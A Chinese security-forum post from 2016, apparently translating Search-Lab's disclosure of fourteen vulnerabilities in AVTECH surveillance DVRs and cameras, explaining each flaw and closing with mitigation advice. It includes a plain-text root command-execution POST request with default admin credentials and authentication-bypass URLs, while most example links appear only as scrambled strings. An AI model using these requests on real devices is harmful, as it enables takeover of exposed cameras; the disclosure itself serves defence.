[翻译]视频监控厂商AVTECH产品多个漏洞分析-智能设备-看雪-安全社区|安全招聘|kanxue.com

[翻译]视频监控厂商AVTECH产品多个漏洞分析

发表于: 2016-10-19 17:17 12618

[翻译]视频监控厂商AVTECH产品多个漏洞分析

光棍节

2016-10-19 17:17

12618

  AVTECH是一家台湾的视频监控设备制造商，公司成立于1996年，是世界领先的闭路电视制造商之一，主要产品有监控设备，网络摄像机，网络录像机等。
  近日，匈牙利安全公司 Search-Lab 发表了一份公告详细的披露了AVTECH监控产品存在的14个漏洞，事实上早在一年之前，该公司就先后4次尝试向AVTECH公司通报发现的漏洞，但是均没有收到回应，该公司于一周之前公布了整个漏洞的详情。

漏洞详情：
  由于很多设备可以直接通过公网IP地址访问，所以影响较大，本文详细的分析漏洞的成因和利用方式。
1、未经身份验证的信息泄露
  由于/cgi-bin/nobody目录下的CGI脚本文件运行权限设置不合理，导致可以在未认证的情况下直接运行，此类型漏洞已经在多个设备中出现，斐讯K1就是因为cgi文件执行权限限制不合理，导致可以直接获取路由器的所有配置信息。
攻击链接示例：fffK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4X3I4@1i4K6y4n7k6r3g2$3K9h3y4W2i4K6g2X3K9i4m8Q4x3U0k6Y4N6q4)9K6b7W2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8X3&6G2j5X3!0V1P5g2)9J5c8V1#2S2j5$3S2A6L8X3g2Q4x3X3g2U0k6$3W2Q4x3@1k6S2j5%4c8A6L8$3&6Q4x3@1c8Y4k6i4c8Q4y4h3k6U0j5i4m8S2j5X3W2D9K9i4c8&6i4K6u0o6i4@1f1^5i4K6S2q4i4@1t1%4i4@1f1#2i4K6S2r3i4K6V1$3i4@1f1$3i4K6V1I4i4K6R3@1i4@1f1#2i4K6R3K6i4K6S2r3i4@1f1#2i4@1p5@1i4@1t1@1i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1^5i4@1q4q4i4@1u0q4i4@1f1#2i4@1p5@1i4K6R3%4i4@1f1@1i4@1u0r3i4@1p5I4i4@1f1$3i4K6R3I4i4@1q4r3i4@1f1K6i4K6R3H3i4K6R3J5

2、DVR设备存在着无需用户登录的ssrf漏洞
  在DVR设备中，Search.cgi可以直接被访问，Search.cgi负责搜索和访问本地网络中的摄像头，Search.cgi提供了cgi_query功能，通过设置ip，port和queryb64str三个参数可以实现直接访问本地网络中的摄像头。
利用实例构造如：cc0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4X3I4@1i4K6y4n7k6r3g2$3K9h3y4W2i4K6g2X3K9i4m8Q4x3U0k6Y4N6q4)9K6b7W2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8X3&6G2j5X3!0V1P5g2)9J5c8W2y4W2j5i4u0U0K9q4)9J5k6h3y4Y4K9g2)9K6c8X3q4U0N6r3W2G2L8W2)9K6c8r3y4Y4K9g2)9#2k6Y4q4#2k6i4u0&6i4K6t1$3K9i4m8Q4x3@1c8Y4L8$3!0Y4L8r3g2Q4x3X3g2U0L8$3#2Q4x3U0k6H3L8%4u0@1i4K6y4p5z5o6m8Q4x3U0k6I4N6h3g2J5P5h3t1$3y4s2y4@1M7W2)9K6c8p5I4%4i4K6y4p5i4K6y4p5
160K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4X3I4@1i4K6y4n7k6r3g2$3K9h3y4W2i4K6g2X3K9i4m8Q4x3U0k6Y4N6q4)9K6b7W2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8X3&6G2j5X3!0V1P5g2)9J5c8W2y4W2j5i4u0U0K9q4)9J5k6h3y4Y4K9g2)9K6c8X3q4U0N6r3W2G2L8W2)9K6c8s2y4U0j5h3&6Q4c8e0S2Q4z5p5g2Q4b7U0N6Q4c8e0g2Q4z5p5k6Q4z5e0k6Q4c8e0g2Q4b7U0q4Q4z5o6m8Q4c8e0g2Q4z5f1k6Q4z5f1k6Q4c8e0N6Q4b7V1c8Q4z5e0q4Q4c8e0c8Q4b7U0S2Q4b7f1c8Q4c8e0k6Q4z5o6W2Q4z5o6m8Q4c8e0k6Q4z5f1y4Q4z5o6W2Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0k6Q4z5e0q4Q4z5o6c8Q4c8e0g2Q4z5o6y4Q4z5p5k6Q4c8e0g2Q4b7e0c8Q4b7U0c8Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0W2Q4z5o6g2Q4z5p5c8Q4c8e0N6Q4b7V1c8Q4b7f1g2Q4c8e0c8Q4b7V1k6Q4b7e0q4Q4c8e0k6Q4z5o6q4Q4b7f1k6Q4c8e0y4Q4z5o6m8Q4z5o6t1`.

3、DVR设置存在着无需用户登录的命令执行漏洞
  Search.cgi中提供的cgi_query功能是通过wget功能实现HTML请求，但是由于对参数没有验证和过滤，可以通过构造参数实现root权限的任意系统命令的执行。
实例链接如下：
884K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4X3I4@1i4K6y4n7k6r3g2$3K9h3y4W2i4K6g2X3K9i4m8Q4x3U0k6Y4N6q4)9K6b7W2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8X3&6G2j5X3!0V1P5g2)9J5c8W2y4W2j5i4u0U0K9q4)9J5k6h3y4Y4K9g2)9K6c8X3q4U0N6r3W2G2L8W2)9K6c8r3y4Y4K9g2)9#2k6Y4q4#2k6i4u0&6i4K6t1$3K9i4m8Q4x3@1c8Y4L8$3!0Y4L8r3g2Q4x3X3g2U0L8$3#2Q4x3U0k6H3L8%4u0@1i4K6y4p5z5o6m8Q4x3U0k6I4N6h3g2J5P5h3t1$3y4s2y4@1M7W2)9K6c8p5I4i4i4K6y4p5i4K6y4p5i4K6t1$3N6i4y4W2M7X3&6S2L8h3g2Q4x3@1c8S2k6r3#2A6L8W2)9J5y4e0t1H3i4K6y4n7h3r3#2D9b7i4m8Q4x3U0f1J5x3s2u0Q4x3U0f1J5x3p5q4U0j5$3!0#2L8Y4c8Q4x3X3g2g2M7$3g2J5x3g2)9J5k6g2m8S2M7%4y4%4L8%4u0V1i4K6t1$3k6%4c8Q4x3@1u0Q4x3U0c8Q4x3U0S2H3M7#2)9%4b7$3N6J5k6i4m8Q4x3U0f1J5x3q4y4W2j5i4u0U0K9q4)9J5k6h3y4Y4K9g2)9%4b7$3N6J5k6i4m8Q4x3U0f1J5x3q4)9J5k6s2k6Q4x3U0f1J5x3r3N6J5k6i4m8Q4y4@1y4Z5k6h3q4V1i4K6t1#2x3U0m8Q4x3X3c8F1i4K6t1#2x3U0l9I4i4K6N6o6j5i4N6C8i4K6t1#2x3U0m8Q4x3U0N6Q4y4@1u0H3M7X3W2F1N6q4)9J5y4e0t1H3"/tmp/"$1".log"}');&password=admin

4、认证绕过漏洞
  可以通过两种方式实现认证绕过:
第一种是.cab方式，cab格式文件是视频播放器插件，存储在web的根目录下，它可以无需验证直接被访问和下载，而设备端只是通过strstr函数查找链接中是否存在.cab字段，如果含有就直接认为免认证。
第二种是nobody方法，同样由于设备端只是通过strstr函数去查找链接中是否存在nobody字段，如果有就直接免认证。
两种方式的链接可以如下，.cab和/nobody可以放在链接中的其他地方，获取设备的配置信息，其中包括登录的用户名和密码。
716K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4X3I4@1i4K6y4n7k6r3g2$3K9h3y4W2i4K6g2X3K9i4m8Q4x3U0k6Y4N6q4)9K6b7W2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8Y4g2K6k6i4u0Q4x3V1k6o6L8$3&6X3K9h3N6Q4x3X3g2U0k6$3W2Q4x3@1k6Q4x3X3g2U0j5h3u0Q4x3U0k6S2j5%4c8A6L8$3&6Q4x3@1c8Y4k6i4c8Q4x3U0k6U0j5i4c8W2k6$3!0J5P5g2)9K6c8p5q4U0j5$3!0#2L8Y4c8Q4x3X3g2Q4x3V1p5`.
a52K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4X3I4@1i4K6y4n7k6r3g2$3K9h3y4W2i4K6g2X3K9i4m8Q4x3U0k6Y4N6q4)9K6b7W2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8Y4g2K6k6i4u0Q4x3V1k6o6L8$3&6X3K9h3N6Q4x3X3g2U0k6$3W2Q4x3@1k6Q4x3V1k6F1L8$3u0G2k6s2W2Q4x3U0k6S2j5%4c8A6L8$3&6Q4x3@1c8Y4k6i4c8Q4x3U0k6U0j5i4c8W2k6$3!0J5P5g2)9K6c8p5q4U0j5$3!0#2L8Y4c8Q4x3X3g2Q4x3V1p5`.

5、web根目录下任意文件下载
  由于.cab字符串是通过strstr方法验证的，那么可以通过在文件名称末尾加上?.cab实现文件下载。作者类推的实验了一下在链接后加上?/nobody，也可以下载文件，漏洞的原因相同。
实例链接：
903K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4X3I4@1i4K6y4n7k6r3g2$3K9h3y4W2i4K6g2X3K9i4m8Q4x3U0k6Y4N6q4)9K6b7W2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8X3y4Y4K9h3u0G2P5q4)9K6c8W2)9J5k6h3y4S2j5R3`.`.
http:///cgi-bin/cgibox?/nobody
6、登录验证码绕过
  设备在登录时通过增加验证码方式防止暴力猜解用户名和密码，但是由于系统设计的不合理，可以通过增加login=quick直接绕过。
链接格式如下：
174K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4X3I4@1i4K6y4n7k6r3g2$3K9h3y4W2i4K6g2X3K9i4m8Q4x3U0k6Y4N6q4)9K6b7W2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8X3&6G2j5X3!0V1P5g2)9J5c8W2k6W2M7X3W2X3P5f1y4G2k6r3g2Q4x3X3g2U0k6$3W2Q4x3@1k6S2j5$3y4G2N6h3&6@1i4K6y4p5i4K6t1$3L8s2c8Q4x3@1u0T1y4U0c8Q4x3U0S2#2M7$3g2J5L8X3q4E0k6g2)9K6b7i4m8S2M7%4y4%4L8%4u0V1i4K6t1&6i4K6t1$3k6%4c8Q4x3@1u0Q4x3U0k6D9L8$3N6A6L8W2)9K6c8s2q4#2K9h3y4C8
如果没有采用quick方式的话，链接的格式如下：
baaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4X3I4@1i4K6y4n7k6r3g2$3K9h3y4W2i4K6g2X3K9i4m8Q4x3U0k6Y4N6q4)9K6b7W2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8X3&6G2j5X3!0V1P5g2)9J5c8W2k6W2M7X3W2X3P5f1y4G2k6r3g2Q4x3X3g2U0k6$3W2Q4x3@1k6S2j5$3y4G2N6h3&6@1i4K6y4p5i4K6t1$3L8s2c8Q4x3@1u0T1y4U0c8Q4x3U0S2#2M7$3g2J5L8X3q4E0k6g2)9K6b7i4m8S2M7%4y4%4L8%4u0V1i4K6t1&6i4K6t1$3k6%4c8Q4x3@1u0Q4x3U0k6U0j5i4m8@1j5$3S2S2i4K6g2X3j5$3!0V1k6g2)9K6c8q4A6h3c8W2g2Q4x3U0k6$3k6i4u0A6k6Y4W2Q4y4h3k6U0L8$3c8W2i4K6y4p5h3W2k6E0d9q4c8x3e0U0g2W2K9f1N6n7
  由于captcha_code和verify_code是配套的，我们可以通过人工设置使他们保持一致同样可以绕过验证码验证，从而暴力猜解用户名和密码。
7、认证后的多个任意命令执行漏洞
第一个：设备通过CloudSetup.cgi支持Avtech云服务，在登录认证通过之后，由于没有对参数进行验证，可以通过exefile参数以root权限执行任意命令。
a59K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4X3I4@1i4K6y4n7k6r3g2$3K9h3y4W2i4K6g2X3K9i4m8Q4x3U0k6Y4N6q4)9K6b7W2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8Y4y4#2M7r3g2J5N6X3W2K6L8%4u0Q4x3V1k6o6L8r3!0#2k6q4y4W2N6s2g2H3i4K6u0W2j5$3N6A6i4K6y4r3k6i4S2W2k6X3W2D9k6g2)9K6c8s2m8K6
第二个：部分设备支持ActionD命令，通过adcommand.cgi文件实现，新版本设备的ActionD提供了DoShellCmd功能，在认证通过之后，由于没有对参数进行验证，可以以root权限执行任意命令。此功能需要以post方式实现，其中cookie中的SSID为用户名和密码的base64值。
POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1
Host:
Content-Length: 23
Cookie: SSID=YWRtaW46YWRtaW4=
DoShellCmd "strCmd=ps&"
第三个：PwdGrp.cgi文件在增加用户或者修改用户时，由于没有对参数进行验证，可以同时以root权限执行其他命令。
5cbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4X3I4@1i4K6y4n7k6r3g2$3K9h3y4W2i4K6g2X3K9i4m8Q4x3U0k6Y4N6q4)9K6b7W2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8Y4y4#2M7r3g2J5N6X3W2K6L8%4u0Q4x3V1k6b7N6$3c8s2M7Y4m8Q4x3X3g2U0k6$3W2Q4x3@1k6S2j5%4c8A6L8$3&6Q4x3@1c8S2k6r3c8Q4x3U0k6#2M7$3g2J5i4K6y4p5N6r3g2K6N6q4)9J5y4Y4m8%4k6q4)9K6c8q4)9K6b7Y4u0W2j5X3!0G2N6q4)9K6b7W2)9J5y4X3N6J5M7q4)9K6c8q4y4g2f1p5g2d9g2V1W2e0e0#2u0Q4x3U0k6D9K9h3k6W2N6r3W2E0k6g2)9K6c8o6g2Q4x3U0f1J5x3p5#2u0e0R3`.`.
8、其他安全漏洞
  第一个：使用没有认证证书的Https服务。系统中的SyncCloudAccount.sh，QueryFromClient.sh和SyncPermit.sh使用wget去访问https网站，如a05K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6H3j5i4W2E0k6h3&6@1i4K6u0W2k6h3q4Y4L8r3g2W2P5h3g2K6i4K6u0W2N6s2N6Q4c8e0N6Q4b7f1c8Q4z5o6W2Q4c8e0y4Q4z5o6m8Q4z5o6u0Q4c8e0N6Q4z5e0c8Q4b7U0q4Q4c8e0c8Q4b7V1q4Q4z5p5g2Q4c8e0k6Q4b7U0u0Q4b7e0q4Q4c8e0k6Q4z5f1y4Q4z5o6W2Q4c8e0S2Q4b7f1k6Q4z5o6q4Q4c8e0c8Q4b7U0W2Q4b7e0k6Q4c8e0W2Q4b7f1q4Q4z5p5y4Q4c8e0S2Q4b7f1k6Q4z5o6q4Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0k6Q4b7f1c8Q4b7e0c8Z5N6s2c8H3M7#2!0q4z5g2)9^5x3q4)9&6b7g2!0q4y4q4!0n7c8W2!0m8x3g2!0q4y4g2)9^5c8W2!0m8c8W2!0q4z5q4)9^5x3#2!0n7c8q4!0q4z5g2)9^5x3g2!0m8c8q4!0q4y4g2)9^5c8W2)9&6y4#2!0q4y4q4!0n7z5q4!0m8c8q4!0q4z5g2)9&6y4#2!0n7y4q4!0q4y4q4!0n7b7g2!0n7b7g2!0q4y4W2)9&6y4q4!0n7b7W2!0q4y4g2)9^5y4#2!0n7b7W2!0q4x3#2)9^5x3q4)9^5x3R3`.`.
  第二个：密码明文存储。容易被攻击轻易获取所有的用户登录密码等敏感信息。
  第三个：CSRF漏洞。设备没有任何防CSRF攻击的措施，当管理员正登录时，可能受到CSRF攻击。

补救措施：
  在shadon上搜索关键词“Avtech”，有超过13万个设备暴露在互联网中，当前avtech关键词搜索已经成为shadon上排名第二的热词，由于厂商目前还没有提供固件更新，所以建议大家采取如下措施来保护：
1、修改默认的登录密码；
2、限制用户通过公网访问设备的web功能。

参考资料：
1、cbaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5i4u0U0K9q4)9J5k6r3I4S2j5W2)9J5k6h3S2#2i4K6u0r3j5h3c8$3K9i4y4G2M7X3W2W2M7#2)9J5c8U0p5J5y4W2)9J5k6r3q4$3N6r3g2U0K9q4)9J5k6r3c8W2N6X3W2U0k6i4y4Q4x3X3c8E0N6h3I4@1K9i4m8D9k6g2)9J5k6s2k6#2L8r3&6W2M7X3q4T1K9h3I4A6N6r3W2W2M7H3`.`.
2、318K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6W2j5Y4g2^5i4K6u0r3b7g2k6f1c8f1y4t1
3、e5dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5%4g2J5K9i4c8&6N6$3g2W2K9#2)9J5k6h3y4G2L8g2)9J5c8Y4y4W2M7X3W2G2N6i4y4Q4x3X3c8X3L8r3q4%4M7#2)9J5k6r3g2^5M7r3!0K6k6g2)9J5k6r3q4$3N6r3g2U0K9q4)9J5k6r3c8W2N6X3W2U0k6i4y4Q4x3X3c8A6L8%4c8Q4x3X3c8T1L8%4c8F1k6i4c8K6

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

上传的附件：

AVtech摄像头系列漏洞.pdf （573.11kb，71次下载）
chrome_2016-10-19_13-53-45.png （23.19kb，34次下载）
chrome_2016-10-19_14-48-57.png （11.47kb，9次下载）
chrome_2016-10-19_16-31-58.png （554.83kb，11次下载）
chrome_2016-10-19_16-36-30.png （44.68kb，6次下载）

收藏・11

免费・3

支持

最新回复 (1)
光棍节雪币： 92 活跃值： (154) 能力值： ( LV8，RANK：135 ) 在线值：发帖 10 回帖 96 粉丝 2 关注私信	光棍节 2 2 楼 CGI文件权限设置不合理，导致被任意用户执行的设备很多啊 2016-10-23 18:46 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

光棍节

发帖

回帖

135

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号